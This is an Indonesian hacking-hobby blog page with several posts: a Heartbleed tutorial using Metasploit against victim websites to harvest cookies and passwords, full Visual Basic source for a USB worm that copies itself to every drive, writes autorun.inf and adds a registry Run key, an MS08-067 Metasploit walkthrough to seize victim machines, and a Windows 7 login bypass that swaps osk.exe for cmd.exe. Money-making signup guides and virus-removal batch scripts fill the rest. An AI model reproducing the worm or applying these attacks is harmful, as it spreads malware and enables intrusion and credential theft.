Showing posts with label artikel. Show all posts
Showing posts with label artikel. Show all posts
peretasan sebuah website adalah salah satu kegemaran para hacker ataupun cracker, tujuannya apa?. banyak hal yang melatar belakangi seorang hacker melakukan peretasan. beberapa diantaranya adalah mendapatkan uang, karna sebuah gengsi, kesenangan pribadi dan atau pekerjaan. peretasan di definisikan sebagai cara atau kegiatan yang di lakukan untuk menyusupi suatu tempat (server) dari kesalahan sistem yang terdapat pada website. cara dan konsep dari peretasan website sangat banyak sekali, tergantung exploit atau bug yang ada pada website tersebut, contohnya yang paling umum dan sering di gunakan adalah Sql Injection, XSS, LFI, RFI, Temper Data. Semua cara tersebut sangat banyak terdapat di web dan blog-blog umum. bug tersebut juga masih ada website-website walaupun sudah lama. tapi kali ini saya tidak akan membahas salah satu dari beberapa teknik peretasan tersebut. beberapa waktu lalu, FBI di kagetkan oleh sebuah exploit yang memanfaatkan bug openSSL server namanya adalah HeartBleed, OpenSSL adalah Sebuah Protocol silahkan lihat definisi OpenSSL. banyak server yang menggunakan protocol Openssl terdapat bug ini, termasuk server Gmail.com . wow, bisa di bayangkan server perusahaan sebesar google, bisa di exploit dengan terdapatnya bug tersebut, tak heran serluruh perusahaan terkenal dan instansi kepemerintahan segera melakukan patch terhadap bug tersebut. tapi tidak semua server telah di patch, bug ini masih baru, dan masih banyak sekali server yang vulnerabel terhadap bug ini.

pada kali ini saya akan memberikan langkah-langkah POC (Proof Of Concept ) dari Exploit HeartBleed menggunakan Metasploit Frame Work, segera saja masuk langkah-langkahnya :


1. Cari website yang mau di periksa , apakah terdapat bug openssl nya.
gunakan file python berikut untuk memeriksanya. download filenya HeartBleed2.PY
2. Buka Terminal ctrl+alt+T ,Lihat IP website korban, ketik ping www.target.com , ternyata ketemu ipnya 127.0.0.1 (localhost)
3.  Masuk ke direktory dimana file heartbleed2.py .
Pada contoh berikut, file heartbleed.py saya simpan di direktory ~/Desktop/Hacking

Ketik cd ~/Desktop/Hacking lalu enter

3. ketik python heartbleed2.py 127.0.0.1
NB : - 127.0.0.1 hanya contoh, saya menyembunyikan link dan ip asli korban.
- warna merah adalah alamat website
- warna lime adalah ip website 


4. Dapat di lihat pada gambar di atas, terdapat kalimat ( WARNING: server returned more data than it should - server is vulnerable! )
kalimat tersebut menandakan bahwa server ternyata vulnerable terhadap bug openssl. setelah tau ternyata server vulnerable, slanjutnya kita buka MSFCONSOLE. 


5. ketik search heartbleed ,tunggu sampai library heartbleed kluar, apabila tidak ada. berarti MetasploitFrameWork anda masih belum uptodate. lebih baik di update dulu ketik msfupdate , tunggu hingga update selesai. dan lakukan mulai langkah 4.
apabila sudah terupdate, library heartbleed akan terlihat. seperti pada gambar di bawah ini. 






6. Pilih auxiliary/scanner/ssl/openssl_heartbleed , ketik use auxiliary/scanner/ssl/openssl_heartblee lalu Enter.

7. setelah itu ketik show options  untuk melihat apa saja value yang perlu di rubah.


8. dapat di lihat pada gambar di atas terdapat beberapa opsi, ada beberapa yang harus di ganti. yaitu RHOSTS dan verbose nya.
ketik set RHOSTS 127.0.0.1 
NB : ganti 127.0.0.1 dengan IP sesuai IP target yang anda dapat .
lalu ketik set verbose true 
9. setelah semua di set, sekarang waktunya eksekusi.

ketik run untuk menjalankan exploitnya.


10. apabila berhasil , anda akan di hadapkan pada code2 seperti cookie, user agent, dan user n password kalau kalian beruntung. inti dari exploit heartbleed adalah kalian akan mendapati pesan-pesan sensitif atau pribadi yang ada dalam server, yang bisa kalian gunakan untuk melakukan tindak hacking selanjutnya.

Sekian artikel saya, Semoga Bermanfaat.

Stay fools to Stay Hungry

NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.



Assalamualaikum....

Bicara tentang Paypal, pasti kita juga akan berbicara tentang Belanja online dan keuntungannya. Paypal dengan semua yang sudah di sebutkan di Wikipedia bahwa PayPal Inc. adalah perusahaan dalam jaringan yang menyediakan jasa transfer uang melalui surat elektronik, menggantikan metode lama yang masih menggunakan kertas, seperti cek dan wesel pos. PayPal juga menyediakan jasa untuk para pemilik situs e-commerce, lelangan, dan jenis usaha lain. Markas perusahaan ini terletak di San Jose, California, Amerika Serikat.
Untuk para freelancer yang memanfaatkan iklan sebagai penghasilannya pasti akan slalu berhubungan dengan yang namanya paypal, karna untuk melakukan withdraw, seorang freelancer membutuhkan layanan jasa untuk mentransfernya ke dalam rekening mereka.

untuk itu di butuhkan akun paypal untuk setiap ingin melakukan kegiatan kirim atau menarik uang secara online, walaupun ada jasa lain yang berfungsi sama. tapi paypal masih menjadi mayoritas penggunaan jasa online trading. karna mayoritas tersebutlah, mengapa saya menulis tutorial ini. 

berikut langka-langkah pembuatan akun paypal :

Beberapa Artikel untuk mendapatkan uang dari Website :

- Cara Mendapatkan Uang dari Adf.ly
- Cara Mendaftar Paypal Indonesia
- Cara Memasang AddsenseCamp

1. Masuk ke Website Paypal


2. Pilih negara dan bahasa Indonesia. Pilih Akun Premier. klik Get started


3. Isilah formulir pendaftaran sesuai tempat kolom yang telah di sediakan.


4. Setelah selesai mengisi formulir, anda akan di direct ke halaman pengisian identitas Kartu Kredit , bagi yang mempunyai kartu kredit silahkan isi, bagi yang tidak punya silahkan klik lewati ini ( Skip ).





5. Setelah selesai, anda akan masuk ke halaman ini -> klik lihat rekening





6. Berikut Tampilan Halaman Rekening Online Anda.






SEMOGA ARTIKEL INI BERMANFAAT!!


Stay Fools, to Stay Hungry

Assalamualaikum....


Adf.ly ?. apa itu ? apa fungsinya ?. dan kenapa banyak di gunakan oleh para freelancer?.

Adf.ly adalah salah satu dari penyedia jasa shorten links yang berfungsi untuk memendekkan link , dengan beberapa tujuan , contohnya agar praktis, tidak makan tempat, dan juga dapat memberikan feedback berupa uang. adf.ly memberikan fasilitas tersebut secara cuma-cuma alias gratis, para freelancer banyak menggunakan adf.ly, alasannya pun sama, karna adf.ly tidak rumit dalam pengoprasiannya. adf.ly memberikan 0.0020$ per klik nya, nominalnya memang kecil tapi akan lumayan apabila di klik terus tiap hari . sedikit demi sedikit , lama lama jadi bukit, itulahh yang di percaya oleh para freelancer. karna memang untuk pendapatan dan pengorbanan yang di lakukan untuk mendapatkan uang itu seimbang, jadi tidak ada keluhan dalam mengerjakannya. cara kerja dari shorten links yaitu tiap link yang di pendekkan akan melewati halaman adf.ly yang berisi iklan, di karenakan hal tersebut, publiser akan mendapatkan uang.

jasa shorten links bukan hanya di adf.ly tapi juga adf.oc , tiny url dan lain lain. berikut ini saya akan memberikan tata cara untuk mendaftar ke adf.ly :

Beberapa Artikel untuk mendapatkan uang dari Website :

- Cara Mendapatkan Uang dari Adf.ly
- Cara Mendaftar Paypal Indonesia
- Cara Memasang AddsenseCamp

1. masuk ke halaman adf.ly -> klik join now

2. Isi formulir registrasi sesuai kolom yang benar.




3. setelah sukses registrasi anda akan di direct ke link berikut. 

4. lakukan verifikasi email, untuk menyelesaikan registrasi adf.ly -> buka email.
5. Dalam email, anda akan mendapatkan code konfirmasi, buka link konfirmasi yang ada di bawahnya code. lalu copy paste code tersebut ke dalam kolom code.
setelah selesai, anda akan masuk ke dalam halaman dasboard adf.ly.


6. setelah masuk kedalam akun adf.ly , lakukan perbaikan profile agar anda dapat melakukan withdraw terhadap uang yang anda dapat.


INGAT! : adf.ly tidak memandang situs dari mana berasal. setiap link yang di pendekkan dari suatu akun. maka akun yang di buat untuk memendekkan link tersebut akan mendapatkan uang, sebanyak link tersebut di klik.

SEMOGA ARTIKEL INI BERMANFAAT!!


Stay Fools, to Stay Hungry




Mendapatkan uang dari blog atau website?. bagaimana caranya? dan mengapa blog dapat menghasilkan uang?. berikut artikelnya.

website itu sama seperti televisi atau media sosial lainnya, mereka akan mendapatkan uang setiap ada iklan yang menyewa jasa publikasi yang di tawarkan media sosial. sama saja seperti blog atau website, kita memberikan lahan atau tempat kepada para advertiser ( Perusahaan yang menawarkan Produk ), untuk mengiklankan produk mereka di blog kita, karna jasa tersebutlah kita di bayar oleh mereka, tapi dalam internet kita tidak langsung di bayar oleh para advertiser. ada semua media perantara antara membayar dan di bayar, yaitu Addsensecamp, sebernnya masih banyak yang lain tapi kali ini kita akan membahas mendapatkan uang dari blog / website melalui jasa addsensecamp.

Addsensecamp adalah jasa yang menawarkan kepada publiser ( orang yang mempunyai blog/website) dan Advertiser ( Perusahaan ), untuk saling berbagi keuntungan. bagaimana caranya?. berikut alurnya : advertiser mendaftarkan produk mereka kedalam website Addsensecamp--> publiser mendaftarkan website mereka kedalam website addsensecamp --> addsensecamp menemukan keduanya agar dapat saling memberi untung --> publiser mengiklankan produk advertiser.
kita sebagai publiser, agar dapat memperoleh uang harus mendaftarkan dulu ke addsensecamp , berikut langkah-langkah mendaftarnya :

Beberapa Artikel untuk mendapatkan uang dari Website :

- Cara Mendapatkan Uang dari Adf.ly
- Cara Mendaftar Paypal Indonesia
- Cara Memasang AddsenseCamp


1. Silakan lakukan pendaftaran terlebih dahulu dengan mengisikan data diri Anda. disini
2. Lakukan konfirmasi pendaftaran pada email yang kami kirimkan.


3. Login ke AdsenseCamp dengan menggunakan username dan password Anda
4. Tambahkan website Anda, tekan submit dan tunggu konfirmasi.

5. Ambil code script iklan AdsenseCamp untuk website Anda, pasang pada web Anda. 
6. Silakan buka website Anda, apabila konfigurasi telah dilakukan dengan benar, maka iklan kami akan langsung terlihat pada website Anda.
 

source : AddsenseCamp


SEMOGA ARTIKEL INI BERMANFAAT!!


Stay Fools, to Stay Hungry






alhamdulillah, satu lagi project yang slesai malam ini. :) berikut adalah project kedua ku, yaitu Worm sederhana.

apa itu worm? google ya? :D hehe

worm ini di buat dari bahasa Basic dengan IDE visual basic 6.0 , worm ini tidak memiliki tujuan jahat. dan hanya bertujuan untuk membuatnya hidup terus dengan menggandakan dirinya ke USB dan PC.

berikut scriptnya :

'Nama       : Bill Tanthowi Jauhari
'tanggal    : 9, januari 2014
'project    : worm
'referensi  : www.google.com , ebook

Dim Nama, direktory As String
'mendapatkan direktory worm
Function tempat()
On Error Resume Next
Dim direktory As String
Nama = App.EXEName & ".exe"
direktory = App.Path
If Right(direktory, 1) <> "\" Then
direktory = direktory & "\"
End If
tempat = direktory & Nama
End Function
'menanam word di registry windows
Function tanam()
On Error Resume Next
Nama = App.EXEName & ".exe"
Shell ("REG ADD HKCU\software\microsoft\windows\currentversion\run /t REG_SZ /v " & Nama & " /d C:\Windows\system32\" & Nama & " /f")
End Function
'mengcopy worm ke semua drive
Function kopi()
On Error Resume Next
Dim filename, direk As String
Dim ulang(6) As String
ulang(1) = "C"
ulang(2) = "D"
ulang(3) = "E"
ulang(4) = "F"
ulang(5) = "G"
ulang(6) = "H"
Nama = App.EXEName & ".exe"
direktory = "C:\windows\system32\"
filename = direktory & Nama
FileCopy tempat, filename
For i = 1 To 6
direk = ulang(i) & ":\"
If Len(Dir(direk)) <> 0 Then
FileCopy tempat, ulang(i) & ":\" & Nama
End If
Next i

End Function
'pengecekan apakah worm masih ada di PC
Function pengecekan()
On Error Resume Next
Dim ulang(6), hasil As String
ulang(1) = "C"
ulang(2) = "D"
ulang(3) = "E"
ulang(4) = "F"
ulang(5) = "G"
ulang(6) = "H"
Nama = App.EXEName & ".exe"
direktory = "C:\windows\system32\"
hasil = direktory & Nama
If Len(Dir(hasil)) = 0 Then
kopi
tanam
End If
For i = 1 To 6
If Len(Dir(ulang(i) & ":\" & Nama)) = 0 Then
kopi
End If
Next i
End Function
'membuat file autorun.inf ke semua drive
Function jalan()
On Error Resume Next
Dim namatext As String
Dim ulang(6) As String
ulang(1) = "C"
ulang(2) = "D"
ulang(3) = "E"
ulang(4) = "F"
ulang(5) = "G"
ulang(6) = "H"
Nama = App.EXEName & ".exe"
For i = 1 To 6
namatext = ulang(i) & ":\autorun.inf"
If Len(Dir(namatext)) = 0 Then
Open namatext For Output As #1
Print #1, "[autorun]"
Print #1, "Open=" & Nama
Close #1
End If
Next i
End Function
'fungsi eksekusi
Private Sub Form_Load()
On Error GoTo rusak
kopi
tanam
jalan
pengecekan
Exit Sub
rusak:
Unload Me
End Sub
'timer untuk menjalankan worm
Private Sub Timer1_Timer()
On Error Resume Next
pengecekan
End Sub

apabila ingin mengembangkan lagi, silahkan download filenya di : WORM

WARNING : di mohon untuk teman-teman agar tidak mengcopy ulang link di atas. penulis mencoba untuk mempertahankan agar link tetap hidup dan dapat terus di gunakan oleh pengunjung yang tertarik untuk mendownloadnya. 




hallo !!!! ketemu  lagi dengan saya. lama banget nggak merawat blog, sekarang saya lagi gencar-gencarnya ngasih ebook. kalo kemaren saya ngasih link tentang pemrograman android, sekarang saya mau ngasih link tentang pemrograman Basic dengan IDE Visual Basic. udah banyak yang tau kan!!

bahasa pemrogaman ini di ciptakan oleh Bill Gates. tau kan orang terkaya sedunia ini menciptakan bahasa pemrograman lalu membuat sebuah OS yang di namai dengan Windows. untuk sejarah masalah VB bisa di cari di google atau wikipedia Okey!!

ini linknya ..... disini

ebook aku taruh di dropbox. terdapat 7 ebook VB berbahasa indonesia . dan semua bisa di download langsung. bagi yang mau download berikut adalah link downloadnya.

===================================================
===================================================


WARNING : di mohon untuk teman-teman agar tidak mengcopy ulang link di atas. penulis mencoba untuk mempertahankan agar link tetap hidup dan dapat terus di gunakan oleh pengunjung yang tertarik untuk mendownloadnya. 




Hallo semua sahabat blogger!!!! wahwah, sudah lama banget nggak ngeblog nih, dari mulai awal Ujian Nasional tinggat SMA sampai sekarang kuliah. :D jadi nggak enak nih mau share tapi malah di sibukin sama kegiatan dan tugas kuliah. mumpung sekarang lagi bebas-bebas nya kegiatan kuliah, saya nyempetin ngasih tutorial + script buat menghilangkan virus ShortCut dan Virus !My Picture.
sebelum menginjak ke langkah-langkahnya, saya akan memberikan ciri-ciri laptop atau PC yang sudah terinfeksi oleh dua virus ini.

# berikut ciri-ciri dari virus Shortcut :
1. setiap kali flashdisk di colokin ke komputer atau laptop , semua isi/file yang ada di dalam flashdisk tersebut akan berubah menjadi shortcut semua.
2. ada software yang bernama "WSCRIPT.EXE" yang di jalankan oleh user. (cara melihatnya bisa melalui task manager)
3. apabila anda menggunakan antivirus SMADAV , tiap kali flashdisk di tancapkan smadav akan langsung mendeteksi adanya virus dan semua file dalam jendela smadav tersebut berekstensi *.lnk .
# Berikut ciri-ciri dari virus !My Picture :
1. setiap drive laptop anda ( partisi hardisk ) contohnya : local disk (D:) atau (C:) dll. akan bisa di temui file yang bernama !My Picture.scr . dengan gambar wanita cantik . :D

2. apabila PC/laptop anda sudah lama terjangkit oleh virus ini.
PC/laptop akan sering BlueScreen.
3. laptop akan selalu restart, ketika di shutdown.

nah, dengan ciri-ciri di atas, kita akan mudah sekali mengenali virus yang ada di PC/laptop kita. sekarang pertanyaannya adalah. apakan laptop anda juga mengalami kejadian yang sama dengan ciri-ciri di atas?. apa bila jawabannya "ya" , anda sekarang berkunjung ke blog yang tepat.
cukup basa-basinya, sekarang lanjut ke langkah-langkahnya. fungsi : membasmi worm shortcut + !My Picture
bahasa : batch progaming
 

langkah-langkah membasmi virus shortcut dengan script :
1. copy sript di bawah ini.

@echo off
taskkill -im wscript.exe -f
taskkill -im wscript.exe -f
REG DELETE "HKCU\Software\Microsoft\Windo
ws\CurrentVersion\Run" /f /v "tlktkovwwq"
cd /d c:\
attrib /s -s -r -h +a tlktkovwwq..vbe
del /s tlktkovwwq..vbe -f
attrib -s -r -h +a d:\*.*
attrib -s -r -h +a e:\*.*
attrib -s -r -h +a f:\*.*
attrib -s -r -h +a g:\*.*
attrib -s -r -h +a h:\*.*
attrib -s -r -h +a i:\*.*
del /s d:\tlktkovwwq..vbe
del /s e:\tlktkovwwq..vbe
del /s f:\tlktkovwwq..vbe
del /s g:\tlktkovwwq..vbe
del /s h:\tlktkovwwq..vbe
del /s i:\tlktkovwwq..vbe
msg * Deleting Worm Shortcut Finish!!
pause

2. buka notepad, lalu paste script tadi.
3. simpan file dengan extensi *.bat. caranya, ganti isi dari combobox " Save as type " yang awalnya "txt" menjadi "all file"--> lalu berinama file tersebut dengan nama "shortcut.bat", tanpa tanda kutip.
4. jalankan file tersebut. ( akan lebih baik di gunakan saat "safe mode").
=============================================================================================
langkah-langkah membasmi virus !My Picture dengan script :
1. copy sript di bawah ini.

@echo off
taskkill -im GoogleChrome.exe -f
taskkill -im GoogleChrome.exe -f
REG DELETE "HKCU\software\ed695f7a0a96a42
1871268638e7cecd4" /f
REG DELETE "HKCU\software\ed695f7a0a96a42
1871268638e7cecd4" /f
cd /d c:\
attrib /
s -s -r -h +a ed695f7a0a96a421871268638e7cecd4.exe
attrib /
s -s -r -h +a ed695f7a0a96a421871268638e7cecd4.exe
del /
s ed695f7a0a96a421871268638e7cecd4.exe
del /
s ed695f7a0a96a421871268638e7cecd4.exe
del /s GoogleChrome.exe
del /s GoogleChrome.exe
del /s *.scr
del /s *.scr
cd /d d:\
del /s *.scr
del /s *.scr
cd /d e:\
del /s *.scr
del /s *.scr
cd /d f:\
del /s *.scr
del /s *.scr
cd /d g:\
del /s *.scr
del /s *.scr
cd /d h:\
del /s *.scr
del /s *.scr
cd /d i:\
del /s *.scr
del /s *.scr
msg * !My Picture has Cleaned
pause
2. buka notepad, lalu paste script tadi.
3. simpan file dengan extensi *.bat. caranya, ganti isi dari combobox " Save as type " yang awalnya "txt" menjadi "all file"--> lalu berinama file tersebut dengan nama "mypicture.bat", tanpa tanda kutip.
4. jalankan file tersebut. ( akan lebih baik di gunakan saat "safe mode").

visit : http://ilmusekolahan.blogspot.com/



bagi yang mau download file *.bat nya langsung, bisa klik download di bawah ini :
DOWNLOAD

WARNING : di mohon untuk teman-teman agar tidak mengcopy ulang link di atas. penulis mencoba untuk mempertahankan agar link tetap hidup dan dapat terus di gunakan oleh pengunjung yang tertarik untuk mendownloadnya. 
hello!!!


sekarang saya mau kasih tutorial bagaimana untuk Exploit Windows XP SP3 dengan Backtrack 5 R3. untuk melakukan exploit, kita akan menggunakan tools penetration testing yang sudah terinstall default di Backtrack 5 R3 yaitu Metasploit Framework(MSF). dalam kerjanya MSF menggunakan module exploit yang sudah tersimpan dalam toolsnya. MSF mempunyai module Exploit yang sangat banyak, dalam kali saya akan menggunakan salah satu modulenya yaitu "windows/smb/ms09_067_netapi" yang sudah terkenal.  :a

tanpa banyak kata lagi. langsung saja ke langkah-langkahnya. :

1. buka terminal.
2. ketik msfcli windows/smb/ms09_067_netapi RHOST=192.168.88.93 PAYLOAD=windows/meterpreter/bind_tcp E
( saya asumsikan Kalian sudah mengetahui IP VIctim nya)
3. tunggu beberapa detik, jika berhasil akan muncul "meterpreter>".
(syarat untuk exploit berhasil adalah firewall dalam victim harus terbuka/nonaktif).
4. setelah masuk meterpreter. kalian terserah mau ngapain. karna komputer korban sudah kalian kendalikan. ^..^
5. untuk lebih leluasa kalian harus mendapatkan user privelage target. dengan cara "migrate" kedalam salah satu process yang ada.
6. caranya ketik "ps".
7. ketik "migrate 644 " angka 644 bisa anda ganti dengan angka yang terdapat pada PID salah satu processnya.
dalam tutorial ini saya sengaja tidak memberikan shortcut karna saya sudah menyiapakan video untuk pembelajaran anda dibawah ini :


Video Tutorial Exploit Netapi

sekian tutorial saya. apabila ada yang tidak jelas bisa kalian tanyakan lewat kolom komentar.

DB : TUTORIAL INI DIPERUNTUKAN HANYA UNTUK PENGETAHUAN SEMATA. SEGALA TINDAKAN DARI USER YANG MENGGUNAKAN TUTORIAL INI. TIDAK DALAM TANGGUNG JAWAB PENULIS(SAYA).

semoga bermanfaat dan sampai jumpa....  :b   :c :d :f :g
:h :i
hay....

-Hack/Crack Password Windows 7-

ketemu lagi.. dengan saya GatesJunior. seperti biasa saya akan memberikan teknik, tips and trick HACKING yang insyalloh bermanfaat. berikut judul tutorial ini adalah "Bypass Windows 7 dengan Windows 7 live CD". nah lho?. jangan kaget ya!. menurut saya windows benar-benar OS yang memiliki banyak "bug". banyak sekali cara untuk membypass login password yang terdapat dalam windows 7. sebelumnya saya sudah memberikan tutorial "bypass windows 7 dengan linux". memang cara itu lebih mudah dari pada cara ini, tapi untuk para HACKER yang selalu ingin tau. gak afdhol kalau tidak berprinsip "ada banyak cara menuju roma" dengan kata lain HACKER harus tau berbagai cara untuk menghilangkan keterbatasan. ^..^ wwakakak. banyak omong nih, langsung saja kita lihat langkah-langkahnya :


langkah-langkah bypass windows 7 dengan windows 7 live CD :

1. siapkan windows 7 live CD.
(apabila anda tidak memilikinya. anda bisa menggukan windows live USB).
apabila ingin tau bagaimana untuk live USB. silahkan klik link berikutini.

2. masukkan CD/DVD anda. atur booting menggunakan CD/DVD ROM.

3. setelah masuk menu Live CD win7. klik Next->klik "repair your computer" ->(lihat keterangan bahwa file system terdapat di drive D:\) klik next-> pilih command prompt.



 4. setelah itu ketikkan: "cd /d D:\windows\system32 " (sesuai yang kita lihat tadi, bahwa file system terdapat di dalam drive D:\).



 5. setelah itu ketik : "move osk.exe hacker.exe" --> "copy cmd.exe osk.exe".

6. lalu exit --> restart.
 7. setelah restart, anda akan di hadapkan pada login interface. klik "ease of access" check pada "On Screen Keyboard" --> klik Ok.




 8. setelah itu akan muncul Command Prompt. ketik "net user". akan terlihat user yang mempunyai akun di PC itu. ketik "net user GATES * ". nama GATES bisa anda ganti dengan nama user yang terdapat pada login interface.

9. tekan enter 2x  sampai muncul kalimat successfully.

10. exit lalu login tanpa mengisi password. VOILAAA!!!!
kita sudah masuk/login tanpa password.

^..^
untuk yang ingin tau cara prakteknya yang lebih jelas, bisa lihat video yang saya siapkan di sini. :


sekian tutorial saya. apabila ada yang tidak jelas bisa kalian tanyakan lewat kolom komentar.

NB :  TUTORIAL INI DIPERUNTUKAN HANYA UNTUK PENGETAHUAN SEMATA. SEGALA TINDAKAN DARI USER YANG MENGGUNAKAN TUTORIAL INI. TIDAK DALAM TANGGUNG JAWAB PENULIS(SAYA).

semoga bermanfaat dan sampai jumpa.... ^_^

halloo!!..

dulu saya pernah posting boot flash dengan unetbootin. nah karena unetbootin hanya khusus untuk OS(operating system) LINUX. sekarang saya mau melengkapi posting boot flash untuk OS WINDOWS, pada kali ini saya menggunakan software WINTOFLASH. software ini bisa digunakan untuk booting berbagai versi OS windows. dengan software ini sudah terjawab sudah semua pertanyaan dan permasalahan para sahabat yang PC nya tidak memiliki CD/DVD-ROM. karena dengan software ini hanya di butuhkan flashdisk untuk melakukan booting OS, yang biasanya di peruntukkan untuk install ulang. ^..^

langsung saja ya. ke langkah-langkah booting windows menggunakan WINTOFLASH.

1. siapkan flashdisk. lalu download dulu software wintoflash disini;
(software ini portable, jadi gak perlu install lagi.)
2. klik2x pada file WinToFlash.exe pada folder windtoflash;
3. klik button yang terdapat gambar check, (windows setup transfer wizard);




4. setelah itu klik next;





5. pada form basic parameters, pilih directory windows instalation pada textbox pertama. ->klik OK. lalu --> pilih direktory flash disk anda.-> klik OK.
NB: 
- apabila file OS windows anda berbentuk file *.iso, anda bisa mount file itu dengan daimontools. bisa download disini.
- apabila file OS windows anda berbentuk file *.iso, dan anda tidak memiliki daimontools, dan hanya memiliki Winrar. anda bisa langsung ekstrak.



6. setelah itu klik Next. --> klik "I do accept the therms blablabla". :) -->tunggu prosess hingga selesai.







7. setelah prosess selesai . klik exit pada form Done.




8. pada form utama wintoflash. klik saja close pada controlbar. -- > kllik "next time".




9. finally. kita reboot PC kita, dan pilih boot lewat flash pada menu boot di bios anda.
10. selamat install ulang. ^..^

demikian tutorial dari saya. maaf apabila ada salah-salah kata. apabila terdapat kalimat atau langkah yang tidak jelas. bisa di tanyakan pada kolom komentar di bawah ini...

sekian. dan sampai jumpa.!!!!!



Previous PostOlder Posts Home